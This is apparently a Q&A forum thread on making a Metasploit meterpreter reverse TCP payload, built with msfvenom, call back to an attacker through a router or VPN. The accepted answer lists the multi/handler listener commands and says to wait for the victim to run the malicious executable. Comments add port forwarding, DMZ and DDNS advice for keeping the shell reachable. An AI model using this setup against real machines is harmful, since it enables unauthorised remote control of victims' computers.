5

I have the following situation:

Attacker machine connected to a router with public IP assigned from ISP, forwarding enabled.

Victim machine connected to another router, (obviously) different IP assigned from different ISP.

I want to establish a meterpreter session with reverse tcp. I create a payload executable with msfvenom, giving the public IP of the attacker router as the LHOST parameter, then I start the listener setting the local IP of the attacker machine as LHOST.

Up to here, no problem.

I tried to do the same with the attacker machine connected to a self-made VPN server, with no success. Is it possible to do this?

If so, which IP addresses do I have to set in both the payload and the listener to get it working?

MKay · 153 · 1 · 1 · 5

2 Answers

3

If you are using a reverse shell, you need to set LHOST to the attacker VPN IP, not your internal LAN IP. Also you need to listen locally with Metasploit on a specific port that you should set in LPORT, and it must be the same as in msfvenom (e.g. 443). To achieve this you can use:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit

Then just wait for the victim to open your malicious executable file.

  • Ok, and what about LHOST in msfvenom? I've tried using VPN public IP with no success. – MKay Apr 02 '16 at 11:03
  • Are you sure that the victim machine can connect to your VPN? Try to ping your VPN IP: is it reachable? –  Apr 02 '16 at 11:11
  • Effectively, ping from victim to VPN does not work, but I can connect to the VPN from every IP address. Why? – MKay Apr 02 '16 at 11:21
  • I think it's a firewall problem. Try to disable it on the VPN server and ping the VPN again; if it works you need to set a rule in the VPN machine firewall –  Apr 02 '16 at 11:26
  • Disabled the firewall; I can ping the server but the exploit still doesn't work. I can't figure out the issue. – MKay Apr 02 '16 at 12:44
  • Wait, is your victim machine connected to VPN? –  Apr 02 '16 at 12:48
  • No, it isn't. Should it be? – MKay Apr 02 '16 at 12:50
  • Yes, because a VPN can connect your machine into a remote LAN; if you use your VPN IP in the LHOST parameter you need to connect your victim machine to the same VPN. With this method you have 2 machines connected in a sort of LAN –  Apr 02 '16 at 12:52
  • So, I was mistaken about everything. I was using the public VPN IP as LHOST for the msfvenom-created payload, but the victim machine was on a different LAN. Is there any way to do this? In any case, I'll flag the answer as accepted, thank you very much. – MKay Apr 02 '16 at 12:59
  • If you want to use your VPN IP, the attacker and victim machine must be on the same VPN, or you can connect to the victim LAN with a VPN or vice versa. The important thing is that the machines must be on the same network if you use a VPN. –  Apr 02 '16 at 13:02
  • I have the same issue. I can ping the listening machine (attacker) from the target machine using the public VPN IP of the attacker. But when I check using canyouseeme.org, I can't see the listening port. I use vpnbook.com and it claims that it doesn't block any port. Just to be sure, I should use the internal IP of the VPN as the LHOST for the listener, right? – wishchaser Feb 13 '17 at 17:26
  • @Cricco95 Supposedly my ISP does not provide me a static IP, and I can not use a VPN because the attacker will have to connect to the VPN first. Is there any alternative to this? – neferpitou Jun 17 '17 at 22:53
  • @user666887 You can just find your public IP and use it as LHOST. Then open a port on your router and forward it to your private IP machine. –  Jun 17 '17 at 23:20
  • @Cricco95 I do understand that, but if I use the net for a long time the IP address changes every 2-3 hrs at most. So is there anything else I could use? – neferpitou Jun 18 '17 at 00:17
  • @user666887 You can use a DDNS –  Jun 18 '17 at 11:21
0

Yes, it is possible if you are using OpenVPN. You could set up a DMZ. OpenVPN has the capabilities to do it. A VPN public IP can forward ports to its clients if configured with a DMZ. You should set the IP of your VPN and not your internal client IP as LHOST.

Tim Jonas · 807 · 1 · 7 · 19